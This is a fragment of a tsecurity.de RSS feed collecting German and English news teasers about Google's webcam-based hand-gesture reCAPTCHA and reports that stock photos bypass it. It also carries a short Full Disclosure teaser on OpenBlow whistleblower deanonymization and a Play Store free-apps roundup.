<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/ba6bed7b795a4c8398f6dbcab7026a1c"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/ba6bed7b795a4c8398f6dbcab7026a1c" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/google-play-store-aktion-diese-77-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-4/">Google Play Store Aktion: Diese 77 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung Winken statt Tippen (alle Infos)]]></title>
<description><![CDATA[Google hat vor wenigen Tagen die neuen Handgesten-Captchas vorgestellt, die schon bei der ersten Ankündigung für Diskussionen sorgen - denn für diese ist der Zugriff auf die Kamera des Nutzers notwendig. Heute wollen wir ein wenig hinter die Kulissen blicken und zeigen euch, wie diese Erkennung f...]]></description>
<link>https://tsecurity.de/de/3662025/it-nachrichten/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-winken-statt-tippen-alle-infos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662025/it-nachrichten/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-winken-statt-tippen-alle-infos/</guid>
<pubDate>Sat, 11 Jul 2026 17:02:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="357" src="https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-1024x571.jpg" class="attachment-large size-large wp-post-image" alt="google recaptcha handgesten" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-1024x571.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-300x167.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-768x429.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-640x357.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-800x446.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Google hat vor wenigen Tagen die neuen <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/"><strong>Handgesten-Captchas</strong></a> vorgestellt, die schon bei der ersten Ankündigung für Diskussionen sorgen - denn für diese ist der Zugriff auf die Kamera des Nutzers notwendig. Heute wollen wir ein wenig hinter die Kulissen blicken und zeigen euch, wie diese Erkennung funktionieren soll und welche technischen Feinheiten für die Auswertung der Handgesten zum Einsatz kommen.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-winken-statt-tippen-alle-infos/">Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung Winken statt Tippen (alle Infos)</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/040733bbdd6c4840a5b9558a494f24ba"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/040733bbdd6c4840a5b9558a494f24ba" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-winken-statt-tippen-alle-infos/">Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung Winken statt Tippen (alle Infos)</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Play Store Aktion: Diese 86 Android-Apps, Spiele, Icon Packs & Live Wallpaper gibt es heute Gratis]]></title>
<description><![CDATA[Zum Start in die neue Aktionen-Woche gibt es im Google Play Store sehr viele temporär kostenlose Apps, Spiele, Icon Packs und Live Wallpaper - schaut mal herein. Heute berichten wir über das Ende des Gratis-Backup für Android, zeigen euch GMail Live und berichten über das Winken als Recaptcha-Ers...]]></description>
<link>https://tsecurity.de/de/3650816/it-nachrichten/google-play-store-aktion-diese-86-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650816/it-nachrichten/google-play-store-aktion-diese-86-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis/</guid>
<pubDate>Tue, 07 Jul 2026 10:01:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="480" src="https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-1024x768.jpg" class="attachment-large size-large wp-post-image" alt="apps 07.07.2026" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-1024x768.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-300x225.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-768x576.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-533x400.jpg 533w, https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026-800x600.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/apps-07.07.2026.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Zum Start in die neue Aktionen-Woche gibt es im Google Play Store sehr viele temporär kostenlose Apps, Spiele, Icon Packs und Live Wallpaper - schaut mal herein. Heute berichten wir über <a href="https://www.googlewatchblog.de/2026/07/android-google-stellt-das-gratis-backup-ein-sicherung-in-der-cloud-wird-jetzt-vom-kontingent-abgezogen/"><strong>das Ende des Gratis-Backup für Android</strong></a>, zeigen euch <a href="https://www.googlewatchblog.de/2026/07/gmail-live-gemini-neue-ki-funktion-durchsucht-euren-posteingang-nach-konkreten-informationen-video/"><strong>GMail Live</strong></a> und berichten über das <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/"><strong>Winken als Recaptcha-Ersatz</strong></a>. Informiert euch auch über das <a href="https://www.googlewatchblog.de/2026/07/whatsapp-jetzt-schnell-sein-so-koennt-ihr-euch-euren-benutzernamen-reservieren-und-das-ist-zu-beachten/"><strong>Reservieren von WhatsApp-Benutzernamen</strong></a>.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/google-play-store-aktion-diese-86-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-2/">Google Play Store Aktion: Diese 86 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/ee22fbff63da42e18f0996ed0a302cfb"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/ee22fbff63da42e18f0996ed0a302cfb" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/google-play-store-aktion-diese-86-android-apps-spiele-icon-packs-live-wallpaper-gibt-es-heute-gratis-2/">Google Play Store Aktion: Diese 86 Android-Apps, Spiele, Icon Packs &amp; Live Wallpaper gibt es heute Gratis</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Tests Hand Gesture Verification CAPTCHA That Uses Webcam Biometrics, Already Bypassed With Stock Photos]]></title>
<description><![CDATA[Google is exploring a new verification method for reCAPTCHA called hand gesture verification (HGV), according to Google Cloud documentation. Thank you for being a Ghacks reader. The post Google Tests Hand Gesture Verification CAPTCHA That Uses Webcam Biometrics, Already Bypassed…
Read more →
The ...]]></description>
<link>https://tsecurity.de/de/3648532/it-security-nachrichten/google-tests-hand-gesture-verification-captcha-that-uses-webcam-biometrics-already-bypassed-with-stock-photos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648532/it-security-nachrichten/google-tests-hand-gesture-verification-captcha-that-uses-webcam-biometrics-already-bypassed-with-stock-photos/</guid>
<pubDate>Mon, 06 Jul 2026 13:09:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google is exploring a new verification method for reCAPTCHA called hand gesture verification (HGV), according to Google Cloud documentation. Thank you for being a Ghacks reader. The post Google Tests Hand Gesture Verification CAPTCHA That Uses Webcam Biometrics, Already Bypassed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/google-tests-hand-gesture-verification-captcha-that-uses-webcam-biometrics-already-bypassed-with-stock-photos/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/google-tests-hand-gesture-verification-captcha-that-uses-webcam-biometrics-already-bypassed-with-stock-photos/">Google Tests Hand Gesture Verification CAPTCHA That Uses Webcam Biometrics, Already Bypassed With Stock Photos</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung in die Kamera winken]]></title>
<description><![CDATA[Auf vielen Webseiten und Web-Apps kommen auch heute noch Captchas zum Einsatz, die mögliche Bots von menschlichen Nutzern unterscheiden sollen. Googles Recaptcha gehört zu den technisch führenden Lösungen, hat allerdings so wie alle anderen Dienste mit zunehmend intelligenteren Bots zu kämpfen. J...]]></description>
<link>https://tsecurity.de/de/3648030/it-nachrichten/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648030/it-nachrichten/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/</guid>
<pubDate>Mon, 06 Jul 2026 09:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="357" src="https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-1024x571.jpg" class="attachment-large size-large wp-post-image" alt="google recaptcha handgesten" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-1024x571.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-300x167.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-768x429.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-640x357.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten-800x446.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/google-recaptcha-handgesten.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Auf vielen Webseiten und Web-Apps kommen auch heute noch Captchas zum Einsatz, die mögliche Bots von menschlichen Nutzern unterscheiden sollen. Googles <strong>Recaptcha</strong> gehört zu den technisch führenden Lösungen, hat allerdings so wie alle anderen Dienste mit zunehmend intelligenteren Bots zu kämpfen. Jetzt hat man angekündigt, zukünftig auf die Webcams der Nutzer zugreifen und Handgesten auswerten zu wollen.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/">Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung in die Kamera winken</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/7d03564d28304c5290a97a8afd472a37"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/7d03564d28304c5290a97a8afd472a37" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/recaptcha-google-ki-will-eure-haende-sehen-nutzer-sollen-zur-autorisierung-in-die-kamera-winken/">Recaptcha: Google-KI will eure Hände sehen – Nutzer sollen zur Autorisierung in die Kamera winken</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Winken vor der Webcam: Googles neuer Bot-Schutz ist schon geknackt]]></title>
<description><![CDATA[Ein Sicherheitscheck, der echte Menschen von Bots trennen soll, ist an einem simplen Foto gescheitert. Google testet seit Mitte Juni eine reCAPTCHA-Variante, die euch auffordert,…
Dieser Artikel Winken vor der Webcam: Googles neuer Bot-Schutz ist schon geknackt erschien zuerst auf SmartDroid.de.]]></description>
<link>https://tsecurity.de/de/3646613/android-tipps/winken-vor-der-webcam-googles-neuer-bot-schutz-ist-schon-geknackt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646613/android-tipps/winken-vor-der-webcam-googles-neuer-bot-schutz-ist-schon-geknackt/</guid>
<pubDate>Sun, 05 Jul 2026 13:08:50 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1920" height="1047" src="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/webcam-captcha-trick-nano-banana-pro-generated-image.jpg?fit=1920%2C1047&amp;ssl=1" class="attachment-medium size-medium wp-post-image" alt="webcam-captcha-trick-nano-banana-pro-generated-image" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/webcam-captcha-trick-nano-banana-pro-generated-image.jpg?w=1920&amp;ssl=1 1920w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/webcam-captcha-trick-nano-banana-pro-generated-image.jpg?resize=1600%2C873&amp;ssl=1 1600w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/webcam-captcha-trick-nano-banana-pro-generated-image.jpg?resize=1536%2C838&amp;ssl=1 1536w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/07/webcam-captcha-trick-nano-banana-pro-generated-image.jpg?w=1800&amp;ssl=1 1800w" sizes="(max-width: 1920px) 100vw, 1920px"><p>Ein Sicherheitscheck, der echte Menschen von Bots trennen soll, ist an einem simplen Foto gescheitert. Google testet seit Mitte Juni eine reCAPTCHA-Variante, die euch auffordert,…</p>
<p>Dieser Artikel <a rel="nofollow" href="https://www.smartdroid.de/winken-vor-der-webcam-googles-neuer-bot-schutz-ist-schon-geknackt/">Winken vor der Webcam: Googles neuer Bot-Schutz ist schon geknackt</a> erschien zuerst auf <a rel="nofollow" href="https://www.smartdroid.de/">SmartDroid.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google testet Captcha-Abfrage per Kamera, User müssen winken]]></title>
<description><![CDATA[Google testet eine neue Variante seines ReCaptcha-Diensts, bei dem nicht mehr nur mittels einfacher Eingaben oder Bildern geprüft wird, ob ein Nutzer ein Mensch ist. Das System nutzt die Frontka­mera oder eine Webcam, um eine Reihe von Merkmalen einer Hand zu erfassen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3643730/it-security-nachrichten/google-testet-captcha-abfrage-per-kamera-user-muessen-winken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643730/it-security-nachrichten/google-testet-captcha-abfrage-per-kamera-user-muessen-winken/</guid>
<pubDate>Fri, 03 Jul 2026 15:52:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159756.html"><img hspace="5" border="0" align="left" alt="Google, Hand, Captcha, Recaptcha, Ei, MediaPipe" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/91849.png"></a>
			Google testet eine neue Variante seines ReCaptcha-Diensts, bei dem nicht mehr nur mittels einfacher Eingaben oder Bildern geprüft wird, ob ein Nutzer ein Mensch ist. Das System nutzt die Frontka­mera oder eine Webcam, um eine Reihe von Merkmalen einer Hand zu erfassen.			(<a href="https://winfuture.de/news,159756.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Winken statt Klicken: Google testet reCAPTCHA per Handgeste]]></title>
<description><![CDATA[Google erprobt derzeit eine neuartige Authentifizierungsmethode (reCAPTCHA), bei der zur Abwehr von Bots einfache Handgesten vor der Webcam ausgeführt werden müssen. Anstatt herkömmliche Bilderrätsel zu lösen, analysiert eine künstliche Intelligenz dabei spezifische Bewegungspunkte der Hand, um d...]]></description>
<link>https://tsecurity.de/de/3642921/it-nachrichten/winken-statt-klicken-google-testet-recaptcha-per-handgeste/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642921/it-nachrichten/winken-statt-klicken-google-testet-recaptcha-per-handgeste/</guid>
<pubDate>Fri, 03 Jul 2026 09:32:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google erprobt derzeit eine neuartige Authentifizierungsmethode (reCAPTCHA), bei der zur Abwehr von Bots einfache Handgesten vor der Webcam ausgeführt werden müssen. Anstatt herkömmliche Bilderrätsel zu lösen, analysiert eine künstliche Intelligenz dabei spezifische Bewegungspunkte der Hand, um die menschliche Identität zu...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/winken-statt-klicken-google-testet-recaptcha-per-handgeste/">Winken statt Klicken: Google testet reCAPTCHA per Handgeste</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenBlow Multiple Deanonymization Vulnerabilities]]></title>
<description><![CDATA[Posted by Red Nanaki via Fulldisclosure on Jul 02OpenBlow Multiple Deanonymization Vulnerabilities

Summary

A production deployment was observed (HTTP archive of a full, real whistleblower
submission) to route its anonymous reporting flow through Google. The intake
CAPTCHA is Google reCAPTCHA, e...]]></description>
<link>https://tsecurity.de/de/3642051/it-security-nachrichten/openblow-multiple-deanonymization-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642051/it-security-nachrichten/openblow-multiple-deanonymization-vulnerabilities/</guid>
<pubDate>Thu, 02 Jul 2026 20:53:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by Red Nanaki via Fulldisclosure on Jul 02</p>OpenBlow Multiple Deanonymization Vulnerabilities<br>
<br>
Summary<br>
<br>
A production deployment was observed (HTTP archive of a full, real whistleblower<br>
submission) to route its anonymous reporting flow through Google. The intake<br>
CAPTCHA is Google reCAPTCHA, enforced as a mandatory, server-validated gate<br>
on report submission, and the UI additionally pulls a web font from<br>
fonts.gstatic.com. As a result, every prospective whistleblower's browser<br>
makes...<br>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bot-Schutz mit Handgesten: Googles reCaptcha lässt sich Fotos unterjubeln]]></title>
<description><![CDATA[Google hat vergangene Woche angekündigt, den reCaptcha-Bot-Schutz mit Handgesten auszustatten. Das lässt sich mit Fotos aushebeln.]]></description>
<link>https://tsecurity.de/de/3635085/it-security-nachrichten/bot-schutz-mit-handgesten-googles-recaptcha-laesst-sich-fotos-unterjubeln/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635085/it-security-nachrichten/bot-schutz-mit-handgesten-googles-recaptcha-laesst-sich-fotos-unterjubeln/</guid>
<pubDate>Tue, 30 Jun 2026 11:37:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google hat vergangene Woche angekündigt, den reCaptcha-Bot-Schutz mit Handgesten auszustatten. Das lässt sich mit Fotos aushebeln.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bot-Schutz mit Handgesten: Googles reCaptcha lässt sich Fotos unterjubeln]]></title>
<description><![CDATA[Google hat vergangene Woche angekündigt, den reCaptcha-Bot-Schutz mit Handgesten auszustatten. Das lässt sich mit Fotos aushebeln.]]></description>
<link>https://tsecurity.de/de/3635063/it-nachrichten/bot-schutz-mit-handgesten-googles-recaptcha-laesst-sich-fotos-unterjubeln/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635063/it-nachrichten/bot-schutz-mit-handgesten-googles-recaptcha-laesst-sich-fotos-unterjubeln/</guid>
<pubDate>Tue, 30 Jun 2026 11:32:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google hat vergangene Woche angekündigt, den reCaptcha-Bot-Schutz mit Handgesten auszustatten. Das lässt sich mit Fotos aushebeln.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Google Recaptcha-Alternative lässt sich mit Stock-Fotos austricksen]]></title>
<description><![CDATA[Google hat eine neue Alternative für Recaptcha-Rätsel vorgestellt: Handgesten. Das System ist offenbar noch nicht ausgereift. (Captcha, Google)]]></description>
<link>https://tsecurity.de/de/3633139/it-nachrichten/security-google-recaptcha-alternative-laesst-sich-mit-stock-fotos-austricksen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3633139/it-nachrichten/security-google-recaptcha-alternative-laesst-sich-mit-stock-fotos-austricksen/</guid>
<pubDate>Mon, 29 Jun 2026 16:16:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google hat eine neue Alternative für Recaptcha-Rätsel vorgestellt: Handgesten. Das System ist offenbar noch nicht ausgereift. (<a href="https://www.golem.de/specials/captcha/">Captcha</a>, <a href="https://www.golem.de/specials/google/">Google</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=210308&amp;page=1&amp;ts=1782742385" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Googles reCaptcha bekommt Handgestenerkennung]]></title>
<description><![CDATA[Eine neue Option soll den Bot-Schutz mittels Googles reCaptcha verbessern. Die Kamera nimmt dafür einfache Handgesten auf.]]></description>
<link>https://tsecurity.de/de/3614678/it-nachrichten/googles-recaptcha-bekommt-handgestenerkennung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614678/it-nachrichten/googles-recaptcha-bekommt-handgestenerkennung/</guid>
<pubDate>Mon, 22 Jun 2026 08:47:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine neue Option soll den Bot-Schutz mittels Googles reCaptcha verbessern. Die Kamera nimmt dafür einfache Handgesten auf.]]></content:encoded>
</item>
<item>
<title><![CDATA[Googles reCaptcha bekommt Handgestenerkennung]]></title>
<description><![CDATA[Eine neue Option soll den Bot-Schutz mittels Googles reCaptcha verbessern. Die Kamera nimmt dafür einfache Handgesten auf.]]></description>
<link>https://tsecurity.de/de/3614662/it-security-nachrichten/googles-recaptcha-bekommt-handgestenerkennung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614662/it-security-nachrichten/googles-recaptcha-bekommt-handgestenerkennung/</guid>
<pubDate>Mon, 22 Jun 2026 08:36:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine neue Option soll den Bot-Schutz mittels Googles reCaptcha verbessern. Die Kamera nimmt dafür einfache Handgesten auf.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google testet reCAPTCHA mit Kamera-Abfrage]]></title>
<description><![CDATA[Google führt ein neues reCAPTCHA-System ein, bei dem Nutzer eine Handgeste vor der Kamera ausführen müssen. Dies stößt auf Datenschutzbedenken.

Tags: #Cyber Security | #Google]]></description>
<link>https://tsecurity.de/de/3612050/it-security-nachrichten/google-testet-recaptcha-mit-kamera-abfrage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612050/it-security-nachrichten/google-testet-recaptcha-mit-kamera-abfrage/</guid>
<pubDate>Sat, 20 Jun 2026 12:36:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920.jpg" class="attachment-full size-full wp-post-image" alt="Google Quelle TY Lim Shutterstock 1107258977 1920" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2022/08/Google-Quelle-TY-Lim-Shutterstock-1107258977-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Google testet reCAPTCHA mit Kamera-Abfrage 1"></p>
    Google führt ein neues reCAPTCHA-System ein, bei dem Nutzer eine Handgeste vor der Kamera ausführen müssen. Dies stößt auf Datenschutzbedenken.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/google">#Google</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA adds hand gesture verification]]></title>
<description><![CDATA[Google has expanded its reCAPTCHA verification system with a new hand gesture authentication method, offering an alternative to traditional image-based challenges like identifying traffic lights or crosswalks. This article has been indexed from CyberMaterial Read the original article: Google reCA...]]></description>
<link>https://tsecurity.de/de/3610506/it-security-nachrichten/google-recaptcha-adds-hand-gesture-verification/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610506/it-security-nachrichten/google-recaptcha-adds-hand-gesture-verification/</guid>
<pubDate>Fri, 19 Jun 2026 15:24:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has expanded its reCAPTCHA verification system with a new hand gesture authentication method, offering an alternative to traditional image-based challenges like identifying traffic lights or crosswalks. This article has been indexed from CyberMaterial Read the original article: Google reCAPTCHA…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/google-recaptcha-adds-hand-gesture-verification/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/google-recaptcha-adds-hand-gesture-verification/">Google reCAPTCHA adds hand gesture verification</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget traffic lights, Google’s reCAPTCHA may ask for hand gestures]]></title>
<description><![CDATA[Google has introduced hand gesture verification for reCAPTCHA, a new method for verifying that a user is human. Google’s reCAPTCHA is part of Google Cloud Fraud Defense, a fraud and abuse prevention platform for bot, account, and transaction protection. It uses risk analysis and challenge-based v...]]></description>
<link>https://tsecurity.de/de/3610152/it-security-nachrichten/forget-traffic-lights-googles-recaptcha-may-ask-for-hand-gestures/</link>
